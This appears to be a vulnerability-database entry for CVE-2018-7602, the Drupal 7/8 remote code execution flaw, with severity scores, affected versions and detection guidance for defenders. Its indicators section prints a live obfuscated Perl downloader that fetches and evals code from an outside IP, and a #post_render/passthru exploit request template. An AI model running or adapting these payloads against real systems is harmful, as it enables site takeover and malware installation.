cbcvebase.
CVE-2018-7602
published 2018-07-19


Priority: P197 · Severity: critical · CVSS 3.1 base score: 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV, ITW, EXPLOIT, Ransomware, Initial access
CISA Known Exploited Vulnerability (due 2022-05-04)
Exploited in the wild
EPSS: 99.24% (99.9th percentile)
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.

Affected

19 ranges

Vendor   Product        Version range             Fixed in
debian   debian_linux   -                         -
debian   debian_linux   -                         -
debian   debian_linux   -                         -
drupal   core           >= 7.0 < 7.59             7.59
drupal   core           >= 8.0 < 8.4.8            8.4.8
drupal   core           >= 8.0.0 < 8.4.8          8.4.8
drupal   core           >= 8.5 < 8.5.3            8.5.3
drupal   core           >= 8.5.0 < 8.5.3          8.5.3
drupal   core           >= unspecified < 7.59     7.59
drupal   core           >= unspecified < 8.5.3    8.5.3
drupal   core           >= unspecified < 8.4.8    8.4.8
drupal   drupal         -                         -
drupal   drupal         >= 7.0 < 7.59             7.59
drupal   drupal         >= 7.0 < 7.59             7.59
drupal   drupal         >= 8.0 < 8.4.8            8.4.8
drupal   drupal         >= 8.4.0 < 8.4.8          8.4.8
drupal   drupal         >= 8.5 < 8.5.3            8.5.3
drupal   drupal         >= 8.5.0 < 8.5.3          8.5.3
drupal   drupal_core    -                         -

Detection & IOCs (extracted from sources)

ip: 147.52.43.159
command: sh -c p$(printf e)rl -e 'BEGIN{$0=$$};use IO::Socket::INET;if(my$c=new IO::Socket::INET(PeerAddr=>"147.52.43.159:80")){print $c $_."\r\n" for (q{GET /sites/z.html HTTP/1.1},q{Host:147.52.43.159},q{User-Agent: Mozilla/5.0},q{});my$x;{local$/=undef;$x=};while($x=~s/(.*)\r\n//){last if$x=~/^$/;}eval($x);}'
hash: 033e78cfb8c9c91e0eeb9174a7c2f551aa27fe71
hash: 37faefefead49b36d19894f87233072464fa55df
hash: 6b709126f5621ec3b04c12aacc7dd3803acdd6b8
hash: 34e2df62adfcbfbba39c74cce50f734bb284f3b3
hash: ed816cf0af6b0627169f67ca2492d7e4ec0e275d
hash: 471026a4954e16e203a859c5df02cdd2cc6e3e7b
hash: 8108be495ea194d796623dfb8358da24605a69f7
hash: 2a87dcfcfcdc4ce17b7e1655bb2f7c2ef7505885
hash: bf2cc8ac57bc761466b39b98bb39d4ac54a4d501
hash: 7d08e8e99f6f705bcea01344165fe9eee6ea3032
hash: 8554a3b4bebd96ec3d1aebe9a0377a2d33ea4a46
hash: aaf8a7610de4d52e4776c9a31351c43ddceec8e8
hash: 269b8aa8cb380b84d8a027e33f545348aad39e0e
hash: 152e70ebb75afce96064ad200292e0d593123c72
hash: d693a5eeb905dba9999970d09fbe7b010a6fa47c
hash: d2aa8367d07b20b023abc9c09c06798c85c83e63
hash: a822a9a3585010305ebd011e4ed067bc8d94bb26
hash: 251bad0a90f19e58350f5e380a248f57c7ec6325
hash: 1e0860b7ac5670592401f39ed2381ec35113f48f
hash: 7b738f7d3af04ca0f557b8dd70785dde68578cb0
hash: ebc08466d16fadeac8b58bec88b12167d3fe8889
hash: 8a71a8a6bf3699190885ec385e3c7f4d880234d1
hash: 234921f046db70257eec90b4b340521035b4a29e
hash: bee2858e02b05ed5c5e9b2b6f9e4dc6bb513d005
hash: 8c8c1cde5d2cdaa25049ffee03793f3c97bf6eae
hash: 7aa3def6bb77003d162a93336db6b830ebebf1ef
hash: fefe0846e5030608b2c8b1728a7c8f190af0bc81
hash: 57cba985f16fc9f7b0441fd42b4c60dec10415f3
hash: 3d52ac0ecce42a28487a4a13c261a86f84b6afbd
hash: 4279c71c5e7c0b0253b5a04762ef13ab9d8e66a6
hash: 18e5ba9f0c9f794839bdcabcb67ca7e67676fecf
ip: 163.172.226.137
ip: 163.172.207.198
ip: 163.172.204.219
ip: 163.172.207.71
ip: 163.172.204.213
ip: 163.172.207.69
ip: 163.172.205.136
url: /?q=user%2Flogin
url: /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}}
command: /?q={{userid}}/cancel&destination={{userid}}/cancel?q[#post_render][]=passthru&q[#type]=markup&q[#markup]=echo COP-2067-8102-EVC | rev
  • The exploit chain abuses the `destination` parameter with a `#post_render` callback set to `passthru` to achieve RCE; look for URL-encoded `%23post_render` or literal `#post_render` in Drupal HTTP requests targeting `/cancel` endpoints
  • Post-exploitation: watch for Apache worker processes spawning `sh -c perl` or the obfuscated `p$(printf e)rl` shell command that downloads a remote Perl script
  • The exploit uses the `file/ajax/actions/cancel/#options/path/` endpoint with a `form_build_id` parameter; monitor for POST requests to this Drupal AJAX path
  • The Shodan query `http.component:"drupal"` can be used to identify exposed Drupal instances for proactive scanning of your own estate
  • Multiple Perl processes running simultaneously with `monero7` as a parameter are a strong indicator of post-exploitation cryptomining activity
  • The attack hides the `perl` invocation using shell obfuscation (`p$(printf e)rl`) to evade simple string-match detections on process names; match on the resolved command line or on process ancestry rather than on the literal string `perl`
  • The Perl script embeds 16 hex-encoded, GZIP-compressed ELF objects that are decoded and loaded at runtime; file-based detections must cover both the compressed and the decompressed form of each ELF object
  • CVE-2018-7602 exploitation requires an authenticated session (a valid Drupal login) as part of the exploit chain; the PoC template performs a login step before triggering RCE, so a successful login immediately followed by a `/cancel` request carrying `#post_render` is a high-fidelity sequence to alert on

CVSS provenance

Source          Version   Score   Severity   Vector
nvd             v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd             v2.0      7.5     HIGH       AV:N/AC:L/Au:N/C:P/I:P/A:P
osv             -         9.8     CRITICAL   -
vulncheck       -         9.8     CRITICAL   -
cisa            -         9.8     CRITICAL   -
vendor_ubuntu   -         3.5     LOW        -